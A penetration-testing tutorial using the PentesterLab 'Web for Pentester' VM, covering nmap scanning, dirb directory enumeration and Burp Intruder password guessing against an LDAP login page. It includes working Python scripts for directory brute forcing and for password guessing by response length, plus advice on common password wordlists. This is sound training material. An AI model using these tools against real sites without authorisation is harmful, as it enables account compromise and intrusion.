In our previous post, we talked about using robots.txt to uncover hidden information about a target website.
By the end of this post you should be able to:
- Use dirb to spider a website for directory content
- Use Burp to attempt a brute forcing attack
You will need the following:
- Kali Linux virtual machine installed and ready to go
- The following ISO file found here booted as a device in VMWare (see Hacking Tutorial): https://www.pentesterlab.com/exercises/web_for_pentester/iso
Alright, let’s get started. Find the target IP address of your vulnerable website by doing an ifconfig inside the terminal that pops up. If you can ping that address from your Kali box and get a response, you have your networking set up correctly. If not, you may have to change the network adapter to bridged or host-only and reboot.
Just like in any penetration test, we will start by enumerating the services that are actually running on the machine we are attacking:
nmap -sV -p- -v -O <ipaddresshere>
You should receive output similar to the following:
Not shown: 65532 closed ports
PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 5.5p1 Debian 6+squeeze3 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.2.16 ((Debian))
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
If you weren’t already aware, most web applications run on ports 80 and 443. It’s possible for them to be on other ports, most commonly 8080, 8443, and 9090, but these are slightly more exotic. Copy and paste this IP address into your browser to see the web application, and you should see a page with the title Web for Pentester.
Dirb
Hopefully your first instinct was to try and check robots.txt for interesting entries. Although this will usually identify some interesting files and directories, it’s not the case here. We are going to take a much noisier approach this time. On a real penetration test, we would only use this tool as a last resort because it is very easy to detect and has the potential of accidentally crashing a smaller site! In a terminal window, type the following command:
dirb http://<IPADDRESS>
This tool automates what you could otherwise only do by hand: it takes a list of common directory names and rapidly requests each one. If the site answers with a 404 (Not Found), dirb skips that name and prints nothing. Any other code, for example 200 (OK) or 403 (Forbidden), means the path exists, and dirb prints it as a hit. One check before trusting the list: make sure the site does not answer every unknown path with the same non-404 code, because a custom "page not found" that returns 200 would make every word in the wordlist look like a hit. You should be able to browse to some of these directories and find interesting files.
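To make the mechanics concrete, here is an added example (not dirb's code and not part of the PentesterLab exercise) that does the same job in a few dozen lines of Python. The wordlist is a constructed stand-in for dirb's common.txt, and the `fetch` parameter exists so the same logic can be run against the lab VM or against a fake responder offline. It also measures the site's not-found code with a random name first, which is the check described above.

```python
import secrets
import urllib.error
import urllib.request
from typing import Callable, Iterable, List, Tuple

# Constructed wordlist for the example; dirb ships much larger lists
# (for example /usr/share/dirb/wordlists/common.txt on Kali).
SAMPLE_WORDLIST = ["admin", "backup", "cgi-bin", "images", "ldap", "secret", "tmp"]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Do not follow 3xx responses; a 301 on /name is itself evidence
    that a directory exists, so we want to see the code, not the target."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None  # returning None makes urlopen raise HTTPError with the 3xx code


_OPENER = urllib.request.build_opener(_NoRedirect)


def http_status(url: str, timeout: float = 5.0) -> int:
    """Return the HTTP status code for a GET of url.

    urllib raises on 3xx/4xx/5xx, so the code is pulled out of the exception;
    a connection failure is reported as 0 so the caller can tell it apart.
    """
    try:
        with _OPENER.open(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code
    except urllib.error.URLError:
        return 0


def brute_force_dirs(base_url: str, words: Iterable[str],
                     fetch: Callable[[str], int] = http_status) -> List[Tuple[str, int]]:
    """Request base_url/<word> for every word and keep anything whose status
    differs from the site's not-found response.

    The not-found code is measured first with a random name: a site that
    answers every unknown path with a custom 200 page would otherwise make
    every word in the list look like a hit. A 403 or 301 still means the
    path exists, which is why only the not-found code is discarded.
    """
    base = base_url.rstrip("/")
    not_found_code = fetch(f"{base}/{secrets.token_hex(8)}")
    found: List[Tuple[str, int]] = []
    for word in words:
        url = f"{base}/{word}"
        code = fetch(url)
        if code == 0 or code == not_found_code:
            continue
        found.append((url, code))
    return found


if __name__ == "__main__":
    import sys
    # Usage: python3 dirs.py http://<IPADDRESS>/   (assumed lab address)
    target = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1/"
    for hit_url, hit_code in brute_force_dirs(target, SAMPLE_WORDLIST):
        print(f"{hit_code} {hit_url}")
```

Like dirb, this is noisy: one request per word, as fast as the loop runs. Against a production site you would add a delay between requests and stop at the first sign of error pages or rate limiting.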
Brute Forcing with Burp
Now open up a new terminal and type burpsuite. Accept the default options and open up your web browser. Burp is what is known as a Web Proxy. This does not mean that it’s something that you use to access blocked games in the library. Instead, it sits in between the requests that you make to the webserver and lets you edit them on the fly before sending them out.
Make sure you change the proxy settings in the Iceweasel web browser to point at the Burp proxy listener, which by default is 127.0.0.1 on port 8080.
If you configured it correctly, trying to browse to a website will seem like it is not loading. This is normal: Burp is holding each request until you look at it and forward it from the Intercept view under the Proxy tab.
Now let’s try and see where this could be useful. Navigate to the following URL in your browser and watch what the request looks like:
http://<IPADDRESS>/ldap/example2.php?name=hacker&password=testpassword
For starters, hit the forward button and see what happens. You should notice that the page loads, but it now displays a message that says unauthenticated. Let’s see if we can use this functionality to guess the password of the account named ‘hacker’.
Make the request in the browser again, but this time don’t forward it through. Click inside the text box and change the word after ‘&password=’ to be PIZZA and then forward it on through. It seems like we were able to change what was sent to the website, but our password was still wrong. Now let’s do this at scale.
Make the request one more time, but this time right click and say “send to intruder” or press Ctrl+I.
Clicking on the now-illuminated Intruder tab brings you to a new menu. Click on “Positions” and you should see your original request, but this time wrapped with funny characters. Click “Clear” to remove these markers. What we want to do is try multiple passwords against the same user and see which one makes the response change. Highlight the word after ‘&password=’ and press “Add” to target this parameter with our wordlist.
When you have it configured as in the screenshot above, click the “Payloads” tab. We want to guess a large list of words, so we can either paste them into the box or load them from a text file. There are numerous ways to get large dictionaries – one of which is rockyou.txt that was discussed in the Hacking blog. Other common guesses include the season followed by the year, sports teams, names, and the username as the password. For now, let’s manually input our guesses:
When you are ready, hit start attack. This will rapidly make these requests and return the resulting response. When you are completely finished, you should see a pane that looks like this:
Notice something interesting? All the failed logins have a Length of 1721, but what about the 7th request? Its length is different. Click on it to see what the response is:
Looks like we found the right password: the password for hacker is “hacker”. The only signal we needed was that the successful login renders a different page than the failures, so its response length stands out when you sort the Length column.
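The same attack, scripted, as an added example that is not part of the PentesterLab exercise and is not Burp's code. It sends one request per candidate password, records the response length (the Length column in Intruder), and flags any response whose length differs from the most common one. So it runs offline, `fake_target` is a constructed stand-in for example2.php with an assumed credential of hacker/hacker; its markup and lengths are invented and only the shape (fail page versus success page) matters. Against the lab VM you would pass `fetch_body` instead.

```python
import urllib.parse
import urllib.request
from collections import Counter
from typing import Callable, Dict, List, Tuple

# Constructed responses for the offline stand-in; the real example2.php
# page looks different, but a failed and a successful login still differ.
FAIL_PAGE = b"<html><body><h1>LDAP example 2</h1><p>Unauthenticated</p></body></html>"
OK_PAGE = b"<html><body><h1>LDAP example 2</h1><p>Authenticated as hacker</p></body></html>"
_VALID = {"hacker": "hacker"}  # assumed credential, matching the result in the post

# Constructed guess list: the kinds of guesses mentioned above, plus the real one.
GUESSES = ["password", "123456", "letmein", "qwerty", "admin", "Summer2015", "hacker"]


def fake_target(url: str) -> bytes:
    """Pretend web server: read name/password from the query string and
    answer with the success page only for a valid pair."""
    query = urllib.parse.parse_qs(urllib.parse.urlsplit(url).query)
    name = query.get("name", [""])[0]
    password = query.get("password", [""])[0]
    return OK_PAGE if _VALID.get(name) == password else FAIL_PAGE


def fetch_body(url: str, timeout: float = 5.0) -> bytes:
    """Real fetch for use against the lab VM."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read()


def build_url(base_url: str, params: Dict[str, str]) -> str:
    # urlencode escapes &, =, spaces and so on, so a guess such as "p&ss=1"
    # cannot be misread by the server as extra query parameters.
    return f"{base_url}?{urllib.parse.urlencode(params)}"


def guess_password(base_url: str, username: str, candidates: List[str],
                   fetch: Callable[[str], bytes] = fetch_body) -> List[Tuple[str, int]]:
    """One request per candidate; returns (candidate, response length) pairs,
    which is the same data Intruder shows in its Length column."""
    results: List[Tuple[str, int]] = []
    for pw in candidates:
        body = fetch(build_url(base_url, {"name": username, "password": pw}))
        results.append((pw, len(body)))
    return results


def find_outliers(results: List[Tuple[str, int]]) -> List[Tuple[str, int]]:
    """Most guesses fail, so the most common length is the failure baseline;
    anything with a different length is worth opening, like request 7 above."""
    if not results:
        return []
    baseline = Counter(n for _, n in results).most_common(1)[0][0]
    return [(pw, n) for pw, n in results if n != baseline]


if __name__ == "__main__":
    # Swap fake_target for fetch_body and use http://<IPADDRESS>/ldap/example2.php
    # (assumed lab URL) to run this against the VM.
    table = guess_password("http://127.0.0.1/ldap/example2.php", "hacker", GUESSES, fake_target)
    for i, (pw, n) in enumerate(table, start=1):
        print(f"{i:2d} {n:5d} {pw}")
    for pw, n in find_outliers(table):
        print(f"candidate found: {pw!r} (length {n})")
```

Length is a crude but effective discriminator. If a target pads responses or includes a per-request token, compare a normalised body or grep for a marker string such as "Authenticated" instead, which is what Burp's "Grep - Match" option does.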
Next steps
This exercise was adapted from the Pentesterlab.com course. Try your hand at some of the other challenges on this machine so you feel comfortable using different tools!
https://www.pentesterlab.com/exercises/web_for_pentester/course